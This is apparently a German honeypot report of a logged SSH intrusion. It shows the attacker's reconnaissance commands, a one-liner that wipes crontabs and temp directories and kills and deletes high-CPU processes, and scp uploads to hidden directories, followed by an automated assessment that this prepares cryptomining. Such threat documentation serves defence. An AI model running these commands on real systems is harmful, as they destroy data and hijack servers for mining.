ALLSmartSecurity
Mitschnitt

SSH-Angriff aus Niederlande: Schadcode nachladen und Einnisten per Cronjob

07.10.2026, 23:24 UTC · 69 Befehle · über ssh · Niederlande · 12× wiederholt

Überblick

Dienst
ssh (Port 22)
Herkunft
Niederlande · TechTies Inc.
Probierte Zugangsdaten
odoo16 / raspberry
Gleiche Sitzung gesehen
12×

Der Angriff, nachgespielt

echter Mitschnitt unserer Fake-Shell; die Antworten sind erfunden, ausgefuehrt wurde nie etwas
odoo16@srv01: ~

odoo16@srv01:~$ uname -m | awk '{printf $1}'
x86_64
odoo16@srv01:~$ uptime | grep -ohe 'up .*' | sed 's/,//g' | awk '{ print $2" "$3 }'
262 days, 04:12
odoo16@srv01:~$ lspci | egrep VGA && lspci | grep 3D
00:02.0 VGA compatible controller: Intel Corporation Xeon E3-1200 v3/4th Gen Core Integrated Graphics Controller (rev 06)
odoo16@srv01:~$ lscpu | egrep "Model name:" | cut -d ' ' -f 14-
Intel(R) Xeon(R) CPU E5-2650 v3 @ 2.30GHz
odoo16@srv01:~$ curl ipinfo.io/org
AS14618
odoo16@srv01:~$ nvidia-smi -q | grep "Product Name" | awk '{print $4, $5, $6, $7, $8, $9, $10, $11}' | wc -l | head -c 1
bash: nvidia-smi: command not found
odoo16@srv01:~$ nvidia-smi -q | grep "Product Name"
bash: nvidia-smi: command not found
odoo16@srv01:~$ lspci | egrep VGA | grep Radeon | wc -l | head -c 1
0
odoo16@srv01:~$ uname -n | awk '{printf $1}'
node3
odoo16@srv01:~$ uname -r | awk '{printf $1}'
5.4.0-150-generic
odoo16@srv01:~$ crontab -r ; rm -rf /var/tmp/.* /var/tmp/* /tmp/.* /tmp/* ; ps aux | awk '$3 > 40.0 && $11 !~ /sshd/ {print $2}' | while read pid; do readlink -f /proc/$pid/exe 2>/dev/null | xargs rm -f 2>/dev/null; kill -9 $pid 2>/dev/null; done ; ps aux | awk '$4 > 60.0 && $11 !~ /sshd/ {print $2}' | while read pid; do readlink -f /proc/$pid/exe 2>/dev/null | xargs rm -f 2>/dev/null; kill -9 $pid 2>/dev/null; d…
bash: pidof: command not found
odoo16@srv01:~$ scp -qt "/var/tmp/fiJfgLLi"
odoo16@srv01:~$ scp -qt "/tmp/fiJfgLLi"
odoo16@srv01:~$ scp -qt "/dev/shm/fiJfgLLi"
odoo16@srv01:~$ uname -s -v -n -r -m
Linux 5.4.0-150-generic #176-Ubuntu SMP Wed Jun 3 13:09:49 UTC 2020 x86_64 node3
odoo16@srv01:~$ echo Qwerty12345 > /tmp/d.log
odoo16@srv01:~$ scp -qt "/var/tmp/ZJIfbFqV"
odoo16@srv01:~$ scp -qt "/tmp/ZJIfbFqV"
odoo16@srv01:~$ scp -qt "/dev/shm/ZJIfbFqV"
odoo16@srv01:~$ uname -s -v -n -r -m
Linux 5.4.0-150-generic #176-Ubuntu SMP Wed Jun 3 13:09:49 UTC 2020 x86_64 node3
odoo16@srv01:~$ echo yahya > /tmp/d.log
odoo16@srv01:~$ scp -qt "/var/tmp/LNFCHXOW"
odoo16@srv01:~$ scp -qt "/tmp/LNFCHXOW"
odoo16@srv01:~$ scp -qt "/dev/shm/LNFCHXOW"
odoo16@srv01:~$ uname -s -v -n -r -m
Linux 5.4.0-150-generic #176-Ubuntu SMP Wed Jun 3 13:09:49 UTC 2020 x86_64 node3
odoo16@srv01:~$ echo support > /tmp/d.log
odoo16@srv01:~$ scp -qt "/var/tmp/FOlGOAJU"
odoo16@srv01:~$ scp -qt "/tmp/FOlGOAJU"
odoo16@srv01:~$ scp -qt "/dev/shm/FOlGOAJU"
odoo16@srv01:~$ uname -s -v -n -r -m
Linux 5.4.0-150-generic #176-Ubuntu SMP Wed Jun 3 13:09:49 UTC 2020 x86_64 node3
odoo16@srv01:~$ echo 1234567890 > /tmp/d.log
odoo16@srv01:~$ scp -qt "/var/tmp/ChNRuEZt"
odoo16@srv01:~$ scp -qt "/tmp/ChNRuEZt"
odoo16@srv01:~$ scp -qt "/dev/shm/ChNRuEZt"
odoo16@srv01:~$ uname -s -v -n -r -m
Linux 5.4.0-150-generic #176-Ubuntu SMP Wed Jun 3 13:09:49 UTC 2020 x86_64 node3
odoo16@srv01:~$ echo 123123 > /tmp/d.log
odoo16@srv01:~$ scp -qt "/var/tmp/pitrrWXm"
odoo16@srv01:~$ scp -qt "/tmp/pitrrWXm"
odoo16@srv01:~$ scp -qt "/dev/shm/pitrrWXm"

Was hier passiert ist

automatisch erstellte Einschätzung, keine Gewähr

Was versucht wurde

Der Angreifer meldete sich mit schwachen Zugangsdaten über SSH an und führte eine Reihe von Systemabfragen durch, um Hardwarekomponenten wie Prozessoren und Grafikkarten zu identifizieren. Anschließend löschte er temporäre Dateien und beendete Prozesse mit hoher CPU-Auslastung, um Ressourcen freizumachen. Danach lud er mehrere Dateien in verschiedene temporäre Verzeichnisse hoch und schrieb kurze Textstrings in eine Logdatei.

Was die Befehle bewirken

Die Befehle uname, lspci und lscpu sammeln Informationen über die Hardwarearchitektur und installierte Treiber. Der Aufruf von nvidia-smi prüft auf NVIDIA-Grafikkarten, was typisch für Mining ist, scheitert hier aber an fehlender Installation. Das Kommando crontab -r löscht geplante Aufgaben, während der folgende Shell-Loop Prozesse mit über 40 Prozent CPU-Auslastung beendet, um Ressourcen zu monopolisieren. Die scp-Befehle kopieren Dateien in versteckte oder temporäre Ordner wie /var/tmp, /tmp und /dev/shm, um Spuren zu verwischen und die Malware zu platzieren.

Worauf es hinauslief

Das Vorgehen deutet stark auf die Vorbereitung von Kryptomining hin, da die Abfragen gezielt nach GPU-Modellen (NVIDIA, Radeon) und CPU-Leistung suchen. Das Löschen anderer Prozesse dient dazu, Rechenleistung für den Miner zu sichern, während die hochgeladenen Dateien vermutlich die Mining-Software selbst sind.

Einordnung

Dieses Muster ist sehr verbreitet und folgt einem standardisierten Skript für automatisierte Angriffe auf Linux-Server mit schwachen Passwörtern.